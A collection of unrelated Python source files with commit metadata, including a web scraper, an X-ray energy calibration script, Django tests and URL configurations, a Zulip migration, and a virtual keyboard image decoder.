of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bs4, requests
from time import sleep
tags = set([])
for i in xrange(1900, 2111):
url = "http://acm.timus.ru/problem.aspx?space=1&num=%d&locale=en" % i
response = requests.get(url)
soup = bs4.BeautifulSoup(response.text, "lxml")
all_as = soup.find("div",
class_="problem_links").previous_sibling.find_all("a")[:-1]
print i, [x.text for x in all_as]
for tmp in all_as:
tags.add(tmp.text)
sleep(1)
print tags | Python | 0 | |
9932b1989038bd3376b1c5d3f5d9c65a21670831 | add energy calibration to xpd | profile_collection/startup/42-energy-calib.py | profile_collection/startup/42-energy-calib.py | from __future__ import division, print_function
import numpy as np
from lmfit.models import VoigtModel
from scipy.signal import argrelmax
import matplotlib.pyplot as plt
def lamda_from_bragg(th, d, n):
return 2 * d * np.sin(th / 2.) / n
def find_peaks(chi, sides=6, intensity_threshold=0):
# Find all potential peaks
preliminary_peaks = argrelmax(chi, order=20)[0]
# peaks must have at least sides pixels of data to work with
preliminary_peaks2 = preliminary_peaks[
np.where(preliminary_peaks < len(chi) - sides)]
# make certain that a peak has a drop off which causes the peak height to
# be more than twice the height at sides pixels away
criteria = chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 + sides]
criteria *= chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 - sides]
criteria *= chi[preliminary_peaks2] >= intensity_threshold
peaks = preliminary_peaks[np.where(criteria)]
left_idxs = peaks - sides
right_idxs = peaks + sides
peak_centers = peaks
left_idxs[left_idxs < 0] = 0
right_idxs[right_idxs > len(chi)] = len(chi)
return left_idxs, right_idxs, peak_centers
def get_energy_from_std_tth(x, y, d_spacings, ns, plot=False):
# step 1 get the zero
auto_corr = np.correlate(y, y, mode='same')
plt.plot(x, auto_corr)
plt.show()
zero_point = np.argmax(auto_corr)
print(len(x)/2, zero_point)
print(x[len(x)/2], x[zero_point])
new_x = x - x[zero_point]
if plot:
plt.plot(x, y, 'b')
plt.plot(x[zero_point], y[zero_point], 'ro')
plt.plot(new_x, y, 'g')
plt.show()
# step 2 get all the maxima worth looking at
l, r, c = find_peaks(y)
print(l, r, c)
lmfig_centers = []
for lidx, ridx, peak_center in zip(l, r, c):
mod = VoigtModel()
pars = mod.guess(y[lidx: ridx],
x=x[lidx: ridx])
out = mod.fit(y[lidx: ridx], pars,
x=x[lidx: ridx])
lmfig_centers.append(out.values['center'])
if plot:
plt.plot(new_x, y)
plt.plot(new_x[c], y[c], 'ro')
plt.show()
wavelengths = []
for center, d, n in zip(lmfig_centers, d_spacings, ns):
wavelengths.append(lamda_from_bragg(center, d, n))
return np.average(wavelengths)
if __name__ == '__main__':
import os
directory = '/home/cwright/Downloads'
filename='Lab6_67p8.chi'
calibration_file = os.path.join(directory, filename)
# step 0 load data
d_spacings = np.loadtxt(calibration_file)
# ns = np.ones(len(d_spacings))
# x = np.linspace(-np.pi, np.pi, 100)
# y = np.sin(x)
# x = np.linspace(-np.pi+1, np.pi, 100)
a = np.loadtxt('/home/cwright/Downloads/Lab6_67p8.chi')
x = a[:, 0]
x = np.hstack((np.zeros(1), x))
print(x.shape)
x = np.hstack((-x[::-1], x))
y = a[:, 1]
y = np.hstack((np.zeros(1), y))
y = np.hstack((y[::-1], y))
x = x[3:]
y = y[3:]
plt.plot(np.linspace(0, 10, x.shape[0]), y)
plt.show()
get_energy_from_std_tth(x, y, [], [], plot=True)
| Python | 0 | |
0136d50265fc390d194436238b88655327982231 | add gobOauth.py | gobOauth.py | gobOauth.py | import praw
import configparser
SAVEFILE = "oauth.ini"
def read_ini():
cfg = configparser.ConfigParser()
cfg.read(SAVEFILE)
return cfg
def get_refreshable_instance():
cfg = read_ini()
reddit = praw.Reddit(client_id=cfg['app']['client_id'],
client_secret=cfg['app']['client_secret'],
refresh_token=cfg['token']['refresh_token'],
user_agent=cfg['app']['user_agent'])
return reddit | Python | 0.000003 | |
e0b84a97e4c7ad5dcef336080657a884cff603fc | Test two windows drawing GL with different contexts. | tests/gl_test_2.py | tests/gl_test_2.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import pyglet.window
from pyglet.window.event import *
import time
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
class ExitHandler(object):
running = True
def on_close(self):
self.running = False
def on_keypress(self, symbol, modifiers):
if symbol == pyglet.window.key.K_ESCAPE:
self.running = False
return EVENT_UNHANDLED
exit_handler = ExitHandler()
def setup():
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(60., 1., 1., 100.)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
glColor4f(.5, .5, .5, .5)
def draw():
global r
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
r += 1
if r > 360: r = 0
glRotatef(r, 0, 0, 1)
glBegin(GL_QUADS)
glVertex3f(-1., -1., -5.)
glVertex3f(-1., 1., -5.)
glVertex3f(1., 1., -5.)
glVertex3f(1., -1., -5.)
glEnd()
w1 = factory.create(width=200, height=200)
w1.push_handlers(exit_handler)
w1.switch_to()
setup()
c = clock.Clock()
w2 = factory.create(width=400, height=400)
w2.push_handlers(exit_handler)
w2.switch_to()
setup()
r = 0
while exit_handler.running:
c.set_fps(60)
w1.switch_to()
w1.dispatch_events()
draw()
w1.flip()
w2.switch_to()
w2.dispatch_events()
draw()
w2.flip()
| Python | 0.000005 | |
bdaa80badf1f3d8c972c5da7d0fe65a0c3f63752 | Update maasutils.py to fix pep8 | tests/maasutils.py | tests/maasutils.py | #!/usr/bin/env python
import os
import sys
import click
from rackspace_monitoring.providers import get_driver
from rackspace_monitoring.types import Provider
import requests
@click.group()
@click.option("--username", required=True)
@click.option("--api-key", required=True)
@click.pass_context
def cli(ctx, api_key, username):
ctx.obj = {
'username': username,
'api-key': api_key
}
url = 'https://identity.api.rackspacecloud.com/v2.0/tokens'
headers = {"Content-type": "application/json"}
data = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": username,
"apiKey": api_key
}
}
}
try:
r = requests.post(url, headers=headers, json=data)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
except requests.exceptions.HTTPError as httpe:
print(httpe)
sys.exit(1)
resp = r.json()
ctx.obj['token'] = resp['access']['token']['id']
monitoring_service = next(
s for s in resp['access']['serviceCatalog']
if s["name"] == "cloudMonitoring"
)
ctx.obj['url'] = monitoring_service['endpoints'][0]['publicURL']
@click.command(name='get_token_url')
@click.pass_context
def get_token_url(ctx):
cred_file = os.path.expanduser('~/maas-vars.rc')
with open(cred_file, 'w') as f:
f.write(
"export MAAS_AUTH_TOKEN={token}\n"
"export MAAS_API_URL={url}\n".format(
token=ctx.obj['token'],
url=ctx.obj['url']
)
)
click.echo(
'Credentials file written to "{cred_file}"'.format(
cred_file=cred_file
)
)
return ctx.obj['token'], ctx.obj['url']
@click.command(name='set_webhook_token')
@click.option("--token", 'webhook_token', required=True)
@click.pass_context
def set_webhook_token(ctx, webhook_token):
"""Sets the token that is included in MaaS webhook notifications
This is one method of verifying that receieved requests are
from MaaS. This is per account.
"""
auth_token, url = ctx.invoke(get_token_url)
try:
response = requests.put(
"{url}/account".format(url=url),
headers={'X-Auth-Token': auth_token},
json={'webhook_token': webhook_token})
response.raise_for_status()
click.echo("Webhook token set to {}".format(webhook_token))
except requests.exceptions.HTTPError as e:
click.echo(response.text)
raise e
@click.command(name='get_entity_id')
@click.option("--label", help="label of entity to get ID for", required=True)
@click.pass_context
def get_entity_id(ctx, label):
Cls = get_driver(Provider.RACKSPACE)
driver = Cls(ctx.obj['username'], ctx.obj['api-key'])
entities = driver.list_entities()
for e in entities:
if label == e.label:
click.echo(e.id)
cli.add_command(get_token_url)
cli.add_command(set_webhook_token)
cli.add_command(get_entity_id)
if __name__ == "__main__":
cli()
| #!/usr/bin/env python
import os
import sys
import click
from rackspace_monitoring.providers import get_driver
from rackspace_monitoring.types import Provider
import requests
@click.group()
@click.option("--username", required=True)
@click.option("--api-key", required=True)
@click.pass_context
def cli(ctx, api_key, username):
ctx.obj = {
'username': username,
'api-key': api_key
}
url = 'https://identity.api.rackspacecloud.com/v2.0/tokens'
headers = {"Content-type": "application/json"}
data = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": username,
"apiKey": api_key
}
}
}
try:
r = requests.post(url, headers=headers, json=data)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
except requests.exceptions.HTTPError as httpe:
print(httpe)
sys.exit(1)
resp = r.json()
ctx.obj['token'] = resp['access']['token']['id']
monitoring_service = next(
s for s in resp['access']['serviceCatalog']
if s["name"] == "cloudMonitoring"
)
ctx.obj['url'] = monitoring_service['endpoints'][0]['publicURL']
@click.command(name='get_token_url')
@click.pass_context
def get_token_url(ctx):
cred_file = os.path.expanduser('~/maas-vars.rc')
with open(cred_file, 'w') as f:
f.write(
"export MAAS_AUTH_TOKEN={token}\n"
"export MAAS_API_URL={url}\n".format(
token=ctx.obj['token'],
url=ctx.obj['url']
)
)
click.echo(
'Credentials file written to "{cred_file}"'.format(
cred_file=cred_file
)
)
return ctx.obj['token'], ctx.obj['url']
@click.command(name='set_webhook_token')
@click.option("--token", 'webhook_token', required=True)
@click.pass_context
def set_webhook_token(ctx, webhook_token):
"""Sets the token that is included in MaaS webhook notifications
This is one method of verifying that receieved requests are
from MaaS. This is per account.
"""
auth_token, url = ctx.invoke(get_token_url)
try:
response = requests.put(
"{url}/account".format(url=url),
headers={'X-Auth-Token': auth_token},
json={'webhook_token': webhook_token})
response.raise_for_status()
click.echo("Webhook token set to {}".format(webhook_token))
except requests.exceptions.HTTPError as e:
click.echo(response.text)
raise e
@click.command(name='get_entity_id')
@click.option("--label", help="label of entity to get ID for", required=True)
@click.pass_context
def get_entity_id(ctx, label):
Cls = get_driver(Provider.RACKSPACE)
driver = Cls(ctx.obj['username'], ctx.obj['api-key'])
entities = driver.list_entities()
for e in entities:
if label == e.label:
click.echo(e.id)
cli.add_command(get_token_url)
cli.add_command(set_webhook_token)
cli.add_command(get_entity_id)
if __name__ == "__main__":
cli() | Python | 0 |
8affb8e4a3744e604b88157a918ef690203cbfa8 | Remove disallowed characters from stream names. | zerver/migrations/0375_invalid_characters_in_stream_names.py | zerver/migrations/0375_invalid_characters_in_stream_names.py | import unicodedata
from django.db import connection, migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
# There are 66 Unicode non-characters; see
# https://www.unicode.org/faq/private_use.html#nonchar4
unicode_non_chars = set(
chr(x)
for x in list(range(0xFDD0, 0xFDF0)) # FDD0 through FDEF, inclusive
+ list(range(0xFFFE, 0x110000, 0x10000)) # 0xFFFE, 0x1FFFE, ... 0x10FFFE inclusive
+ list(range(0xFFFF, 0x110000, 0x10000)) # 0xFFFF, 0x1FFFF, ... 0x10FFFF inclusive
)
def character_is_printable(character: str) -> bool:
return not (unicodedata.category(character) in ["Cc", "Cs"] or character in unicode_non_chars)
def fix_stream_names(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Stream = apps.get_model("zerver", "Stream")
Realm = apps.get_model("zerver", "Realm")
total_fixed_count = 0
realm_ids = Realm.objects.values_list("id", flat=True)
if len(realm_ids) == 0:
return
print("")
for realm_id in realm_ids:
print(f"Processing realm {realm_id}")
realm_stream_dicts = Stream.objects.filter(realm_id=realm_id).values("id", "name")
occupied_stream_names = set(stream_dict["name"] for stream_dict in realm_stream_dicts)
for stream_dict in realm_stream_dicts:
stream_name = stream_dict["name"]
fixed_stream_name = "".join(
[
character if character_is_printable(character) else "\N{REPLACEMENT CHARACTER}"
for character in stream_name
]
)
if fixed_stream_name == stream_name:
continue
if fixed_stream_name == "":
fixed_stream_name = "(no name)"
# The process of stripping invalid characters can lead to collisions,
# with the new stream name being the same as the name of another existing stream.
# We append underscore until the name no longer conflicts.
while fixed_stream_name in occupied_stream_names:
fixed_stream_name += "_"
occupied_stream_names.add(fixed_stream_name)
total_fixed_count += 1
with connection.cursor() as cursor:
cursor.execute(
"UPDATE zerver_stream SET name = %s WHERE id = %s",
[fixed_stream_name, stream_dict["id"]],
)
print(f"Fixed {total_fixed_count} stream names")
class Migration(migrations.Migration):
atomic = False
dependencies = [
("zerver", "0374_backfill_user_delete_realmauditlog"),
]
operations = [
migrations.RunPython(fix_stream_names, reverse_code=migrations.RunPython.noop),
]
| Python | 0 | |
1deb35d9aa62a6c950cb978063c7f4aed645067b | Add utility module for logging | mediacloud/mediawords/util/log.py | mediacloud/mediawords/util/log.py | import logging
def create_logger(name):
"""Create and return 'logging' instance."""
formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
l = logging.getLogger(name)
l.setLevel(logging.DEBUG)
l.addHandler(handler)
return l
| Python | 0 | |
12c483953f39a3bacaab6d49ba17c4920db52179 | Add script to clean up all FD phone and fax numbers. | firecares/firestation/management/commands/cleanup_phonenumbers.py | firecares/firestation/management/commands/cleanup_phonenumbers.py | from django.core.management.base import BaseCommand
from firecares.firestation.models import FireDepartment
from phonenumber_field.modelfields import PhoneNumber
import re
"""
This command is for cleaning up every phone and fax number in the
database. It removes all non-numeric characters, such as parenthesis,
hyphens, spaces, etc. It also removes prefixed 1s These numbers should
be made human-readable on the client side.
"""
def cleanNumber(no1):
no2 = re.sub('[^0-9]','', no1)
if no2.startswith("1"):
no2 = no2[1:]
return no2
class Command(BaseCommand):
def handle(self, *args, **kwargs):
print("Don't worry, it always takes this long.")
for fd in FireDepartment.objects.all():
# If the FD has a phone number, clean it up
if fd.headquarters_phone and not fd.headquarters_phone.raw_input == "Invalid Input":
newPhone = cleanNumber(fd.headquarters_phone.raw_input)
print(newPhone)
fd.headquarters_phone = newPhone
# If the FD has a fax number, clean it up
if fd.headquarters_fax and not fd.headquarters_fax.raw_input == "Invalid Input":
newFax = cleanNumber(fd.headquarters_fax.raw_input)
print(newFax)
fd.headquarters_fax = newFax
# Save and continue to the next FD (if any)
fd.save()
print("Completed successfully!")
| Python | 0 | |
07d723368550b94202804aa2cc29c6242fbde26e | Add virtual keyboard tool | weboob/tools/virtkeyboard.py | weboob/tools/virtkeyboard.py | # -*- coding: utf-8 -*-
# Copyright(C) 2011 Pierre Mazière
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import hashlib
import Image
class VirtKeyboardError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class VirtKeyboard(object):
def __init__(self, file,coords,color=None):
# file: virtual keyboard image
# coords: dictionary <value to return>:<tuple(x1,y1,x2,y2)>
# color: color of the symbols in the image
# depending on the image, it can be a single value or a tuple
self.color=color
img=Image.open(file)
self.bands=img.getbands()
(self.width,self.height)=img.size
self.pixar=img.load()
self.coords={}
self.md5={}
for i in coords.keys():
if self.color is None:
self.coords[i]=coords[i]
else:
coord=self.get_symbol_coords(coords[i])
if coord==(-1,-1,-1,-1):
continue
self.coords[i]=coord
self.md5[i]=self.checksum(self.coords[i])
def get_symbol_coords(self,(x1,y1,x2,y2)):
newY1=-1
newY2=-1
for y in range(y1,min(y2+1,self.height)):
empty_line=True
for x in range(x1,min(x2+1,self.width)):
if self.pixar[x,y] == self.color:
empty_line=False
if newY1==-1:
newY1=y
break;
else:
break
if newY1!=-1 and empty_line:
newY2=y-1
break
newX1=-1
newX2=-1
for x in range(x1,min(x2+1,self.width)):
empty_column=True
for y in range(y1,min(y2+1,self.height)):
if self.pixar[x,y] == self.color:
empty_column=False
if newX1==-1:
newX1=x
break
else:
break
if newX1!=-1 and empty_column:
newX2=x-1
break
return (newX1,newY1,newX2,newY2)
def checksum(self,(x1,y1,x2,y2)):
s = ''
for y in range(y1,min(y2+1,self.height)):
for x in range(x1,min(x2+1,self.width)):
if self.pixar[x,y]==self.color:
s += "."
else:
s += " "
return hashlib.md5(s).hexdigest()
def get_symbol_code(self,md5sum):
for i in self.md5.keys():
if md5sum == self.md5[i]:
return i
raise VirtKeyboardError('Symbol not found')
def generate_MD5(self,dir):
for i in self.coords.keys():
width=self.coords[i][2]-self.coords[i][0]+1
height=self.coords[i][3]-self.coords[i][1]+1
img=Image.new(''.join(self.bands),(width,height))
matrix=img.load()
for y in range(height):
for x in range(width):
matrix[x,y]=self.pixar[self.coords[i][0]+x,self.coords[i][1]+y]
img.save(dir+"/"+self.md5[i]+".png")
| Python | 0 | |
c99b4c9c4b42d7f6c1e3800ed5595e86db95b6cf | finish hello world program for dajax | gui/ajax.py | gui/ajax.py | # -*- coding: UTF-8 -*-
'''
Created on 2013-03-25
@author: tianwei
Desc: This module will be used for ajax request, such as form valid, search
query, calculated submit.
'''
import simplejson
from dajaxice.decorators import dajaxice_register
@dajaxice_register(method='GET')
@dajaxice_register(method='POST', name="calculate_submit_post")
def calculate_submit(request, data):
return simplejson.dumps({'message': 'tianwei hello world!'+data})
| Python | 0.997924 | |
88cacd862477ded4344ac1ab3de1580d09f6db9c | add org level and lables | indicators/test.py | indicators/test.py | from django.test import TestCase
from django.test import RequestFactory
from django.test import Client
from indicators.models import Indicator, IndicatorType, DisaggregationType, ReportingFrequency, CollectedData
from workflow.models import Program, Country, Organization
from django.contrib.auth.models import User
class IndicatorTestCase(TestCase):
fixtures = ['fixtures/organization.json','fixtures/country.json']
def setUp(self):
new_organization = Organization.objects.create(name="tola")
new_organization.save()
get_organization = Organization.objects.get(name="tola")
new_country = Country.objects.create(country="testcountry", organization=get_organization)
new_country.save()
get_country = Country.objects.get(country="testcountry")
new_program = Program.objects.create(name="testprogram")
new_program.save()
new_program.country.add(get_country)
get_program = Program.objects.get(name="testprogram")
new_indicator_type = IndicatorType.objects.create(indicator_type="testtype")
new_indicator_type.save()
get_indicator_type = IndicatorType.objects.get(indicator_type="testtype")
new_disaggregation = DisaggregationType.objects.create(disaggregation_type="disagg")
new_disaggregation.save()
get_disaggregation = DisaggregationType.objects.get(disaggregation_type="disagg")
new_frequency = ReportingFrequency.objects.create(frequency="newfreq")
new_frequency.save()
get_frequency = ReportingFrequency.objects.get(frequency="newfreq")
user = User.objects.create_user('john', 'lennon@thebeatles.com', 'johnpassword')
user.save()
get_user = User.objects.get(username='john')
new_indicator = Indicator.objects.create(name="testindicator",number="1.2.3",source="testing",
baseline="10",lop_target="10", reporting_frequency=get_frequency)
new_indicator.save()
new_indicator.disaggregation.add(get_disaggregation)
new_indicator.indicator_type.add(get_indicator_type)
new_indicator.program.add(get_program)
get_indicator = Indicator.objects.get(name="testindicator")
new_collected = CollectedData.objects.create(targeted="12",achieved="20", description="somevaluecollected", indicator=get_indicator)
new_collected.save()
def test_indicator_exists(self):
"""Check for Indicator object"""
get_indicator = Indicator.objects.get(name="testindicator")
self.assertEqual(Indicator.objects.filter(id=get_indicator.id).count(), 1)
def test_collected_exists(self):
"""Check for CollectedData object"""
get_collected = CollectedData.objects.get(description="somevaluecollected")
self.assertEqual(CollectedData.objects.filter(id=get_collected.id).count(), 1)
| from django.test import TestCase
from django.test import RequestFactory
from django.test import Client
from indicators.models import Indicator, IndicatorType, DisaggregationType, ReportingFrequency, CollectedData
from workflow.models import Program, Country, Organization
from django.contrib.auth.models import User
class IndicatorTestCase(TestCase):
fixtures = ['fixtures/organziation.json','fixtures/country.json']
def setUp(self):
new_organization = Organization.objects.create(name="tola")
new_organization.save()
get_organization = Organization.objects.get(name="tola")
new_country = Country.objects.create(country="testcountry", organization=get_organization)
new_country.save()
get_country = Country.objects.get(country="testcountry")
new_program = Program.objects.create(name="testprogram")
new_program.save()
new_program.country.add(get_country)
get_program = Program.objects.get(name="testprogram")
new_indicator_type = IndicatorType.objects.create(indicator_type="testtype")
new_indicator_type.save()
get_indicator_type = IndicatorType.objects.get(indicator_type="testtype")
new_disaggregation = DisaggregationType.objects.create(disaggregation_type="disagg")
new_disaggregation.save()
get_disaggregation = DisaggregationType.objects.get(disaggregation_type="disagg")
new_frequency = ReportingFrequency.objects.create(frequency="newfreq")
new_frequency.save()
get_frequency = ReportingFrequency.objects.get(frequency="newfreq")
user = User.objects.create_user('john', 'lennon@thebeatles.com', 'johnpassword')
user.save()
get_user = User.objects.get(username='john')
new_indicator = Indicator.objects.create(name="testindicator",number="1.2.3",source="testing",
baseline="10",lop_target="10", reporting_frequency=get_frequency)
new_indicator.save()
new_indicator.disaggregation.add(get_disaggregation)
new_indicator.indicator_type.add(get_indicator_type)
new_indicator.program.add(get_program)
get_indicator = Indicator.objects.get(name="testindicator")
new_collected = CollectedData.objects.create(targeted="12",achieved="20", description="somevaluecollected", indicator=get_indicator)
new_collected.save()
def test_indicator_exists(self):
"""Check for Indicator object"""
get_indicator = Indicator.objects.get(name="testindicator")
self.assertEqual(Indicator.objects.filter(id=get_indicator.id).count(), 1)
def test_collected_exists(self):
"""Check for CollectedData object"""
get_collected = CollectedData.objects.get(description="somevaluecollected")
self.assertEqual(CollectedData.objects.filter(id=get_collected.id).count(), 1)
| Python | 0.000008 |
2db51d6c117bbe0555ddffe34f52679685c68fbb | update url | indicators/urls.py | indicators/urls.py | from django.conf.urls import patterns, include, url
from .views import CollectedDataList, CollectedDataCreate, CollectedDataUpdate, CollectedDataDelete, IndicatorCreate, IndicatorDelete, IndicatorUpdate,\
IndicatorList, IndicatorExport
urlpatterns = patterns('',
###INDICATOR PLANING TOOL
#Home
url(r'^home/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
#Indicator Report
url(r'^report/(?P<program>\w+)/$', 'indicators.views.indicator_report', name='indicator_report'),
url(r'^program_report/(?P<program>\w+)/$', 'indicators.views.programIndicatorReport', name='programIndicatorReport'),
#Indicator Form
url(r'^indicator_list/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
url(r'^indicator_create/(?P<id>\w+)/$', 'indicators.views.indicator_create', name='indicator_create'),
url(r'^indicator_add/(?P<id>\w+)/$', IndicatorCreate.as_view(), name='indicator_add'),
url(r'^indicator_update/(?P<pk>\w+)/$', IndicatorUpdate.as_view(), name='indicator_update'),
url(r'^indicator_delete/(?P<pk>\w+)/$', IndicatorDelete.as_view(), name='indicator_delete'),
#Collected Data List
url(r'^collecteddata/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/(?P<agreement>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata_add/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataCreate.as_view(), name='collecteddata_add'),
url(r'^collecteddata_import/$', 'indicators.views.collecteddata_import', name='collecteddata_import'),
url(r'^collecteddata_update/(?P<pk>\w+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),
url(r'^collecteddata_delete/(?P<pk>\w+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),
url(r'^collecteddata_export/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
#Indicator Data Report
url(r'^data/(?P<id>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/map/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/graph/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/table/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^export/(?P<program>\w+)/$', IndicatorExport.as_view(), name='indicator_export'),
url(r'^export_data/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataExport.as_view(), name='indicator_data_export'),
#ajax calls
url(r'^service/(?P<service>[-\w]+)/service_json/', 'indicators.views.service_json', name='service_json'),
url(r'^collected_data_table/(?P<indicator>[-\w]+)/(?P<program>[-\w]+)/', 'indicators.views.collected_data_json', name='collected_data_json'),
url(r'^program_indicators/(?P<program>[-\w]+)/', 'indicators.views.program_indicators_json', name='program_indicators_json'),
) | from django.conf.urls import patterns, include, url
from .views import CollectedDataList, CollectedDataCreate, CollectedDataUpdate, CollectedDataDelete, IndicatorCreate, IndicatorDelete, IndicatorUpdate,\
IndicatorList, IndicatorExport, CollectedDataExport
urlpatterns = patterns('',
###INDICATOR PLANING TOOL
#Home
url(r'^home/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
#Indicator Report
url(r'^report/(?P<program>\w+)/$', 'indicators.views.indicator_report', name='indicator_report'),
url(r'^program_report/(?P<program>\w+)/$', 'indicators.views.programIndicatorReport', name='programIndicatorReport'),
#Indicator Form
url(r'^indicator_list/(?P<pk>\w+)/$', IndicatorList.as_view(), name='indicator_list'),
url(r'^indicator_create/(?P<id>\w+)/$', 'indicators.views.indicator_create', name='indicator_create'),
url(r'^indicator_add/(?P<id>\w+)/$', IndicatorCreate.as_view(), name='indicator_add'),
url(r'^indicator_update/(?P<pk>\w+)/$', IndicatorUpdate.as_view(), name='indicator_update'),
url(r'^indicator_delete/(?P<pk>\w+)/$', IndicatorDelete.as_view(), name='indicator_delete'),
#Collected Data List
url(r'^collecteddata/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata/(?P<indicator>\w+)/(?P<program>\w+)/(?P<agreement>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
url(r'^collecteddata_add/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataCreate.as_view(), name='collecteddata_add'),
url(r'^collecteddata_import/$', 'indicators.views.collecteddata_import', name='collecteddata_import'),
url(r'^collecteddata_update/(?P<pk>\w+)/$', CollectedDataUpdate.as_view(), name='collecteddata_update'),
url(r'^collecteddata_delete/(?P<pk>\w+)/$', CollectedDataDelete.as_view(), name='collecteddata_delete'),
url(r'^collecteddata_export/(?P<program>\w+)/(?P<indicator>\w+)/$', CollectedDataList.as_view(), name='collecteddata_list'),
#Indicator Data Report
url(r'^data/(?P<id>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/map/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/graph/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/table/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^data/(?P<id>\w+)/(?P<program>\w+)/$', 'indicators.views.indicator_data_report', name='indicator_data_report'),
url(r'^export/(?P<program>\w+)/$', IndicatorExport.as_view(), name='indicator_export'),
url(r'^export_data/(?P<indicator>\w+)/(?P<program>\w+)/$', CollectedDataExport.as_view(), name='indicator_data_export'),
#ajax calls
url(r'^service/(?P<service>[-\w]+)/service_json/', 'indicators.views.service_json', name='service_json'),
url(r'^collected_data_table/(?P<indicator>[-\w]+)/(?P<program>[-\w]+)/', 'indicators.views.collected_data_json', name='collected_data_json'),
url(r'^program_indicators/(?P<program>[-\w]+)/', 'indicators.views.program_indicators_json', name='program_indicators_json'),
) | Python | 0.000001 |
7d128f2386fd3bbcbff1a407018f9ab9ed580810 | Add tests for path join | tests/test_path.py | tests/test_path.py | from gypsy.path import _join
def test_join():
assert _join('s3://', 'bucket', 'prefix') == 's3://bucket/prefix'
assert _join('s3://bucket', 'prefix') == 's3://bucket/prefix'
assert _join('bucket', 'prefix') == 'bucket/prefix'
| Python | 0 | |
7589e8c746d264b4e8ebcdcf932ddd9620d419a3 | Implement user tests | tests/test_user.py | tests/test_user.py | import unittest
import json
from app import create_app, db
class UserTest(unittest.TestCase):
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
self.user = {"username": "nerd",
"password": "nerdy",
"email": "nerd@tests.com "
}
def test_registration_successful(self):
"""Test successful user registration."""
response = self.client.post("auth/register",
data=json.dumps(self.user),
content_type="application/json")
